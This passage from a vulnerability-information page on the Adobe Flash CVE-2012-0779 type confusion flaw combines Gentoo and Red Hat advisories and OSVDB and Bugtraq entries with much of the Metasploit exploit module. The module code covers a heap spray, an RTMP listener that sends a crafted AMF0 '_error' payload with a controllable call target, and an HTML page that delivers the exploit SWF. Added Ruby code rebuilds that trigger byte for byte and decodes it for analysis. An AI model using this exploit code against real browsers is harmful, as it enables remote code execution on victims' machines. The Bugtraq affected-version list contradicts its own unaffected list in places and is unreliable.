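    body += b"\x0a\x00\x00\x00\x03"
    for n in (7.0, 8.0, 9.0):
        body += b"\x00" + struct.pack(">d", n)
    return _chunk(body)


def constructed_normal_error_response():
    """Constructed sample of a well-formed `_error`: null command object + info Object."""
    body = _amf_str("_error") + b"\x00" + struct.pack(">d", 1.0) + b"\x05"
    body += b"\x03" + b"\x00\x04code" + _amf_str("NetConnection.Connect.Failed")
    body += b"\x00\x05level" + _amf_str("error") + b"\x00\x00\x09"
    return _chunk(body)
```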

- Vulnerability information (F114134)

Gentoo Linux Security Advisory 201206-21 (PacketStormID:F114134)
2012-06-24 00:00:00
Gentoo  security.gentoo.org
advisory,denial of service,arbitrary,vulnerability
linux,gentoo
CVE-2012-0779,CVE-2012-2034,CVE-2012-2035,CVE-2012-2036,CVE-2012-2037,CVE-2012-2038,CVE-2012-2039,CVE-2012-2040
[Download]

Gentoo Linux Security Advisory 201206-21 - Multiple vulnerabilities have been found in Adobe Flash Player that could result in the execution of arbitrary code or Denial of Service. Versions less than 11.2.202.236 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201206-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: Adobe Flash Player: Multiple vulnerabilities
     Date: June 23, 2012
     Bugs: #414603, #420311
       ID: 201206-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Adobe Flash Player that could
result in the execution of arbitrary code or Denial of Service.

Background
==========

The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  www-plugins/adobe-flash   < 11.2.202.236         >= 11.2.202.236

Description
===========

Multiple vulnerabilities have been discovered in Adobe Flash Player.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could entice a user to open a specially crafted SWF
file, possibly resulting in execution of arbitrary code with the
privileges of the process or a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Flash Player users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.236"

References
==========

[ 1 ] CVE-2012-0779
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0779
[ 2 ] CVE-2012-2034
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2034
[ 3 ] CVE-2012-2035
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2035
[ 4 ] CVE-2012-2036
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2036
[ 5 ] CVE-2012-2037
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2037
[ 6 ] CVE-2012-2038
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2038
[ 7 ] CVE-2012-2039
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2039
[ 8 ] CVE-2012-2040
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2040

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-201206-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

- Vulnerability information (F114107)

Adobe Flash Player Object Type Confusion (PacketStormID:F114107)
2012-06-23 00:00:00
sinn3r,juan vazquez  metasploit.com
exploit,remote,arbitrary,code execution
CVE-2012-0779,OSVDB-81656
[Download]

This Metasploit module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 "_error" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "World Uyghur Congress Invitation.doc" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	def exploit
		@swf = create_swf

		# Boilerplate required to handle pivoted listeners
		comm = datastore['ListenerComm']
		if comm == "local"
			comm = ::Rex::Socket::Comm::Local
		else
			comm = nil
		end

		@rtmp_listener = Rex::Socket::TcpServer.create(
			'LocalHost' => datastore['RTMPHOST'],
			'LocalPort' => datastore['RTMPPORT'],
			'Comm'      => comm,
			'Context'   => {
				'Msf'        => framework,
				'MsfExploit' => self,
			}
		)

		# Register callbacks
		@rtmp_listener.on_client_connect_proc = Proc.new { |cli|
			add_socket(cli)
			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
			on_rtmp_connect(cli)
		}

		@rtmp_listener.start

		super
	end

	def my_read(cli,size,timeout=nil)
		if timeout.nil?
			timeout = cli.def_read_timeout
		end

		buf = ""
		::Timeout::timeout(timeout) {
			while buf.length < size
				buf << cli.get_once(size - buf.length)
			end
		}
		buf
	end

	def do_handshake(cli)
		c0 = my_read(cli, 1)
		c1 = my_read(cli, 1536) # HandshakeSize => 1536
		s0 = "\3" # s0
		s1 = Rex::Text.rand_text(4) # s1.time
		s1 << "\x00\x00\x00\x00" # s1.zero
		s1 << Rex::Text.rand_text(1528) # s1.random_data
		s2 = c1 # s2
		cli.put(s0)
		cli.put(s1)
		cli.put(s2)
		c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
	end

	def on_rtmp_connect(cli)

		begin
			do_handshake(cli)
			request = my_read(cli, 341) # connect request length

			case request
			when /connect/
				rtmp_header = "\x03" # Chunk Stream ID
				rtmp_header << "\x00\x00\x00" # Timestamp
				rtmp_header << "\x00\x00\x71" # Body Size
				rtmp_header << "\x14" # AMF0 Command
				rtmp_header << "\x00\x00\x00\x00" # Stream ID

				# String
				rtmp_body = "\x02" # String
				rtmp_body << "\x00\x06" # String length
				rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
				# Array
				rtmp_body << "\x0a" # AMF Type: Array
				rtmp_body << "\x00\x00\x00\x05" # Array length: 5
				# Array elements
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Crafted Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
				# Number
				rtmp_body << "\x00" # AMF Type: Number
				rtmp_body << [rand(0x40000000)].pack("V") +  "\x00\x00\x00\x00" # Number

				trigger = rtmp_header
				trigger << rtmp_body

				cli.put(trigger)
				@rtmp_listener.close_client(cli)
			end
		rescue
		ensure
			@rtmp_listener.close_client(cli)
			remove_socket(cli)
		end

	end

	def cleanup
		super
		return if not @rtmp_listener
		begin
			@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
			if @rtmp_listener.kind_of?(Rex::Socket)
				@rtmp_listener.close
				@rtmp_listener.stop
			end
			@rtmp_listener = nil
		rescue ::Exception
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		print_status("Client requesting: #{request.uri}")

		if request.uri =~ /\.swf$/
			print_status("Sending Exploit SWF")
			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
			return
		end

		p = payload.encoded
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

		if not my_target['Rop'].nil?
			js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
			js = get_aligned_spray(my_target, js_rop, js_nops)
		else
			js = get_easy_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
		swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

		if datastore['RTMPHOST'] == '0.0.0.0'
			rtmp_host = Rex::Socket.source_address('1.2.3.4')
		else
			rtmp_host = datastore['RTMPHOST']
		end

		rtmp_port = datastore['RTMPPORT']

		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<center>
		<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
		id="test" width="1" height="1"
		codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
		<param name="movie" value="#{swf_uri}" />
		<param name="FlashVars" value="var1=#{rtmp_host}&var2=#{rtmp_port}" />
		<embed src="#{swf_uri}" quality="high"
		width="1" height="1" name="test" align="middle"
		allowNetworking="all"
		type="application/x-shockwave-flash"
		pluginspage="http://www.macromedia.com/go/getflashplayer"
		FlashVars="var1=#{rtmp_host}&var2=#{rtmp_port}">
		</embed>

		</object>
		</center>

		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def create_swf
		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
		fd = ::File.open( path, "rb" )
		swf = fd.read(fd.stat.size)
		fd.close

		return swf
	end

end

=begin

* Flash Player 11.2.202.228

(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????

0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]
104b1b30 53              push    ebx
104b1b31 ffd0            call    eax

=end
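The RTMP handshake that the module's do_handshake answers, with both sides run over a local socket pair. This is an added example, not code from the Metasploit module: the client half stands in for what Flash Player sends when the SWF opens the RTMP connection (a C0 version byte, a 1536-byte C1, then C2 echoing S1), and the server half does what do_handshake does plus the two checks the module skips, that C0 carries version 3 and that C2 echoes S1. The byte layout follows the module's own comments (HandshakeSize 1536; S1 is a 4-byte time, 4 zero bytes and 1528 random bytes); the module, method and keyword names are mine.

```ruby
require 'socket'
require 'timeout'

module RtmpHandshake
  VERSION        = 0x03
  HANDSHAKE_SIZE = 1536   # C1, S1, C2 and S2 are each 1536 bytes

  # Read exactly +size+ bytes or raise, as the module's my_read does.
  def self.read_exact(io, size, timeout = 5)
    buf = "".b
    Timeout.timeout(timeout) do
      buf << io.readpartial(size - buf.bytesize) while buf.bytesize < size
    end
    buf
  end

  # 4-byte time, 4 zero bytes, 1528 random bytes: the C1/S1 layout.
  def self.handshake_block
    [Time.now.to_i].pack("N") + "\x00\x00\x00\x00".b + Random.new.bytes(1528)
  end

  # Server side, what do_handshake does: S0 = version, S1 = fresh block,
  # S2 = echo of C1, then read C2. With verify: true it also rejects a wrong
  # C0 version and a C2 that does not echo S1, which the module never checks.
  def self.server(io, verify: true)
    c0 = read_exact(io, 1).unpack1("C")
    raise "bad C0 version #{c0}" if verify && c0 != VERSION
    c1 = read_exact(io, HANDSHAKE_SIZE)
    s1 = handshake_block
    io.write([VERSION].pack("C") + s1 + c1)
    c2 = read_exact(io, HANDSHAKE_SIZE)
    raise "C2 does not echo S1" if verify && c2 != s1
    { c1: c1, s1: s1, c2: c2 }
  end

  # Client side, what Flash Player does when the SWF opens the RTMP connection.
  def self.client(io, verify: true)
    c1 = handshake_block
    io.write([VERSION].pack("C") + c1)
    s0 = read_exact(io, 1).unpack1("C")
    raise "bad S0 version #{s0}" if verify && s0 != VERSION
    s1 = read_exact(io, HANDSHAKE_SIZE)
    s2 = read_exact(io, HANDSHAKE_SIZE)
    raise "S2 does not echo C1" if verify && s2 != c1
    io.write(s1)                     # C2 = echo of S1
    { c1: c1, s1: s1, s2: s2 }
  end

  # Both sides over a UNIX socket pair, so it runs with no network at all.
  def self.run_local
    srv_sock, cli_sock = Socket.pair(:UNIX, :STREAM)
    server_thread = Thread.new { server(srv_sock) }
    client_view   = client(cli_sock)
    [server_thread.value, client_view]
  ensure
    srv_sock&.close
    cli_sock&.close
  end
end

if __FILE__ == $0
  srv, cli = RtmpHandshake.run_local
  puts "S2 echoed C1: #{cli[:s2] == cli[:c1]}, C2 echoed S1: #{srv[:c2] == srv[:s1]}"
end
```

`RtmpHandshake.run_local` returns the server's and the client's view of the exchange so the two can be compared; calling `server` with `verify: false` gives the module's permissive behaviour, which accepts any C0 byte and any 1536 bytes of C2.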
    
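The AMF0 command message that on_rtmp_connect sends back to the Flash client, decoded. This is an added example and not part of the module: `build_trigger` reproduces the module's byte layout with the random leading dwords fixed to 0x41414141 so the bytes are reproducible, `parse_trigger` checks the 12-byte chunk header (the declared body size 0x71 must equal the 113 bytes that follow, and type 0x14 must be an AMF0 command) and then decodes the body as a sequence of AMF0 values, and `nonzero_tail_numbers` lists every Number whose last four wire bytes are not zero. On the module's trigger that is exactly one value, the one carrying "\x0c\x0c\x0c\x0c"; the module's comment says changing those bytes changes the call target, and the crash dump at the end of the module shows a controlled value in edx being dereferenced as an object (`mov eax,[edx+2Ch]` then `call eax`). The check fingerprints this module's output, not the vulnerability in general. Module, constant and method names are mine.

```ruby
require 'stringio'

module Amf0Trigger
  NUMBER       = 0x00
  STRING       = 0x02
  STRICT_ARRAY = 0x0a
  AMF0_COMMAND = 0x14   # RTMP message type id the module puts in the chunk header

  Header = Struct.new(:chunk_stream_id, :timestamp, :body_size, :type_id, :stream_id)

  # A decoded Number keeps its eight wire bytes. tail_dword is the last four of
  # them, the position where the module writes "\x0c\x0c\x0c\x0c".
  AmfNumber = Struct.new(:value, :raw) do
    def tail_dword
      raw.byteslice(4, 4).unpack1("N")
    end
  end

  # Constructed stand-in for what on_rtmp_connect sends: same layout, with the
  # random leading dwords replaced by a fixed filler so the bytes are reproducible.
  def self.build_trigger(call_target = 0x0c0c0c0c, filler = 0x41414141)
    header  = [0x03].pack("C")                    # fmt 0, chunk stream id 3
    header << "\x00\x00\x00".b                    # timestamp
    header << "\x00\x00\x71".b                    # body size, 0x71 = 113 bytes
    header << [AMF0_COMMAND].pack("C")
    header << "\x00\x00\x00\x00".b                # message stream id
    number  = ->(tail) { [NUMBER].pack("C") + [filler].pack("V") + [tail].pack("N") }
    body  = [STRING].pack("C") + [6].pack("n") + "_error".b
    body << [NUMBER].pack("C") + [2.0].pack("G")  # 0x4000000000000000 on the wire
    body << [STRICT_ARRAY].pack("C") + [5].pack("N")
    body << number.call(0) * 5                    # the five declared elements
    body << number.call(call_target)              # the crafted Number
    body << number.call(0) * 4
    header + body
  end

  def self.take(io, n)
    s = io.read(n)
    raise "truncated input (wanted #{n} bytes)" unless s && s.bytesize == n
    s
  end

  # 12-byte "fmt 0" chunk header, as the module builds it.
  def self.parse_header(io)
    basic = take(io, 1).unpack1("C")
    raise "only fmt 0 chunk headers are handled" unless (basic >> 6).zero?
    ts   = ("\x00".b + take(io, 3)).unpack1("N")
    size = ("\x00".b + take(io, 3)).unpack1("N")
    type = take(io, 1).unpack1("C")
    sid  = take(io, 4).unpack1("V")
    Header.new(basic & 0x3f, ts, size, type, sid)
  end

  def self.parse_value(io)
    marker = take(io, 1).unpack1("C")
    case marker
    when NUMBER
      raw = take(io, 8)
      AmfNumber.new(raw.unpack1("G"), raw)        # big-endian IEEE-754 double
    when STRING
      take(io, take(io, 2).unpack1("n"))
    when STRICT_ARRAY
      Array.new(take(io, 4).unpack1("N")) { parse_value(io) }
    else
      raise "unsupported AMF0 marker 0x%02x" % marker
    end
  end

  # Returns [header, top-level values]. Rejects a header whose body size does not
  # match the bytes that follow, and anything that is not an AMF0 command.
  def self.parse_trigger(bytes)
    io   = StringIO.new(bytes)
    hdr  = parse_header(io)
    body = io.read
    unless hdr.body_size == body.bytesize
      raise "body size mismatch: header says #{hdr.body_size}, got #{body.bytesize}"
    end
    raise "not an AMF0 command message (type 0x%02x)" % hdr.type_id unless hdr.type_id == AMF0_COMMAND
    bio = StringIO.new(body)
    values = []
    values << parse_value(bio) until bio.eof?
    [hdr, values]
  end

  # Every Number, at any depth, whose tail dword is non-zero, as [path, dword]
  # pairs. All the Numbers the module sends carry zero there except the crafted
  # one, so this fingerprints the module's trigger rather than the bug itself.
  def self.nonzero_tail_numbers(values, path = [])
    values.each_with_index.flat_map do |v, i|
      case v
      when AmfNumber then v.tail_dword.zero? ? [] : [[path + [i], v.tail_dword]]
      when Array     then nonzero_tail_numbers(v, path + [i])
      else []
      end
    end
  end
end

if __FILE__ == $0
  hdr, values = Amf0Trigger.parse_trigger(Amf0Trigger.build_trigger)
  puts "body size #{hdr.body_size}, #{values.length} top-level values"
  Amf0Trigger.nonzero_tail_numbers(values).each do |path, dword|
    puts "Number at #{path.inspect} carries 0x%08x in its tail dword" % dword
  end
end
```

Decoding the module's bytes gives eight top-level values: the command name `_error`, the transaction id 2.0, the five-element strict array, and five more Numbers, of which the first (index 3) is the crafted one. Note that the strict array header declares five elements while ten Numbers follow it, so the last five are separate top-level arguments rather than array members; the decoder keeps that distinction instead of folding them together.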

- Vulnerability information (F112990)

Red Hat Security Advisory 2012-0688-01 (PacketStormID:F112990)
2012-05-24 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2012-0779

Red Hat Security Advisory 2012-0688-01 - The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. This update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed on the Adobe security page APSB12-09, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the specially-crafted SWF content. All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 10.3.183.19.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: flash-plugin security update
Advisory ID:       RHSA-2012:0688-01
Product:           Red Hat Enterprise Linux Extras
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2012-0688.html
Issue date:        2012-05-23
CVE Names:         CVE-2012-0779 
=====================================================================

1. Summary:

An updated Adobe Flash Player package that fixes one security issue is now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.

The Red Hat Security Response Team has rated this update as having critical
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64

3. Description:

The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.

This update fixes one vulnerability in Adobe Flash Player. This
vulnerability is detailed on the Adobe security page APSB12-09, listed in
the References section. Specially-crafted SWF content could cause
flash-plugin to crash or, potentially, execute arbitrary code when a victim
loads a page containing the specially-crafted SWF content. (CVE-2012-0779)

All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 10.3.183.19.

4. Solution:

Before applying this update, make sure all previously-released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258

5. Bugs fixed (http://bugzilla.redhat.com/):

819003 - CVE-2012-0779 flash-plugin: arbitrary code execution via object confusion (APSB12-09)

6. Package List:

Red Hat Enterprise Linux Desktop Supplementary (v. 5):

i386:
flash-plugin-10.3.183.19-1.el5.i386.rpm

x86_64:
flash-plugin-10.3.183.19-1.el5.i386.rpm

Red Hat Enterprise Linux Server Supplementary (v. 5):

i386:
flash-plugin-10.3.183.19-1.el5.i386.rpm

x86_64:
flash-plugin-10.3.183.19-1.el5.i386.rpm

Red Hat Enterprise Linux Desktop Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

Red Hat Enterprise Linux Server Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

Red Hat Enterprise Linux Workstation Supplementary (v. 6):

i386:
flash-plugin-10.3.183.19-1.el6.i686.rpm

x86_64:
flash-plugin-10.3.183.19-1.el6.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2012-0779.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-09.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>.  More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFPvKXzXlSAg2UNWIIRAqaqAKCS5KXp2ShcerttnPyE9rBOo/PQeQCeMJvO
Z4wtYL99s3Eifb3p+HVMqj8=
=tMiQ
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- Vulnerability information

OSVDB ID: 81656
Title: Adobe Flash Player Object Confusion Unspecified Remote Code Execution
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS, Upgrade
Exploit: Exploit Private, Virus / Malware
Disclosure: Vendor Verified, Discovered in the Wild

- Vulnerability description

Adobe Flash Player contains a flaw related to object confusion that may allow a remote attacker to execute arbitrary code. No further details have been provided.

- Timeline

2012-05-04 Unknown
2012-06-25 2012-05-04

- Solution

Upgrade to version 11.2.202.235 or higher (11.1.115.8 or 11.1.111.9 for Android), as it has been reported to fix this vulnerability. In addition, Adobe has released a patch for some older versions.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

Title: Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability
Class: Unknown
Bugtraq ID: 53395
Remote: Yes
Local: No
Published: 2012-05-04 12:00:00
Updated: 2012-08-03 10:32:00
Credit: Microsoft Vulnerability Research

- Affected versions

SuSE SUSE Linux Enterprise Desktop 11 SP2
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Desktop 11 SP1
+ Linux kernel 2.6.5
Red Hat Enterprise Linux Workstation Supplementary 6
Red Hat Enterprise Linux Supplementary 5 server
Red Hat Enterprise Linux Server Supplementary 6
Red Hat Enterprise Linux Desktop Supplementary 6
Red Hat Enterprise Linux Desktop Supplementary 5 client
Adobe Flash Player 10.1.53 .64
Adobe Flash Player 10.1.51 .66
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.45 2
Adobe Flash Player 10.0.32 18
Adobe Flash Player 10.0.22 .87
Adobe Flash Player 10.0.15 .3
Adobe Flash Player 10.0.12 .36
Adobe Flash Player 10.0.12 .35
Adobe Flash Player 11.2.202.233
Adobe Flash Player 11.2.202.229
Adobe Flash Player 11.2.202.229
Adobe Flash Player 11.2.202.228
Adobe Flash Player 11.2.202.223
Adobe Flash Player 11.1.115.7
Adobe Flash Player 11.1.115.6
Adobe Flash Player 11.1.112.61
Adobe Flash Player 11.1.111.8
Adobe Flash Player 11.1.111.7
Adobe Flash Player 11.1.111.6
Adobe Flash Player 11.1.111.5
Adobe Flash Player 11.1.102.63
Adobe Flash Player 11.1.102.62
Adobe Flash Player 11.1.102.55
Adobe Flash Player 11.1.102.228
Adobe Flash Player 11.0.1.152
Adobe Flash Player 10.3.186.7
Adobe Flash Player 10.3.186.6
Adobe Flash Player 10.3.186.3
Adobe Flash Player 10.3.186.2
Adobe Flash Player 10.3.185.25
Adobe Flash Player 10.3.185.23
Adobe Flash Player 10.3.185.22
Adobe Flash Player 10.3.185.22
Adobe Flash Player 10.3.185.21
Adobe Flash Player 10.3.183.7
Adobe Flash Player 10.3.183.5
Adobe Flash Player 10.3.183.4
Adobe Flash Player 10.3.183.10
Adobe Flash Player 10.3.181.34
Adobe Flash Player 10.3.181.26
Adobe Flash Player 10.3.181.23
Adobe Flash Player 10.3.181.22
Adobe Flash Player 10.3.181.16
Adobe Flash Player 10.3.181.16
Adobe Flash Player 10.3.181.14
Adobe Flash Player 10.2.159.1
Adobe Flash Player 10.2.157.51
Adobe Flash Player 10.2.156.12
Adobe Flash Player 10.2.154.28
Adobe Flash Player 10.2.154.27
Adobe Flash Player 10.2.154.25
Adobe Flash Player 10.2.154.24
Adobe Flash Player 10.2.154.18
Adobe Flash Player 10.2.154.13
Adobe Flash Player 10.2.153.1
Adobe Flash Player 10.2.152.33
Adobe Flash Player 10.2.152.32
Adobe Flash Player 10.2.152.21
Adobe Flash Player 10.2.152
Adobe Flash Player 10.1.95.2
Adobe Flash Player 10.1.95.2
Adobe Flash Player 10.1.95.1
Adobe Flash Player 10.1.92.8
Adobe Flash Player 10.1.92.10
Adobe Flash Player 10.1.92.10
Adobe Flash Player 10.1.85.3
Adobe Flash Player 10.1.82.76
Adobe Flash Player 10.1.52.15
Adobe Flash Player 10.1.52.14.1
Adobe Flash Player 10.1.106.16
Adobe Flash Player 10.1.105.6
Adobe Flash Player 10.1.102.65
Adobe Flash Player 10.1.102.64
Adobe Flash Player 10.0.42.34
Adobe Flash Player 10.0.32.18
Adobe Flash Player 10
Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9

- Unaffected versions

Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9

- Discussion

Adobe Flash Player is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

The following versions are affected:

Adobe Flash Player 11.2.202.233 and prior versions for Windows, Mac OS and Linux operating systems
Adobe Flash Player 11.1.115.7 and prior versions for Android 4.x
Adobe Flash Player 11.1.111.8 and prior versions for Android 3.x and 2.x

- Exploit

Reports indicate this issue is being actively exploited in the wild.

The following exploit is available:

- Solution

Updates are available. Please see the references for more information.

- References
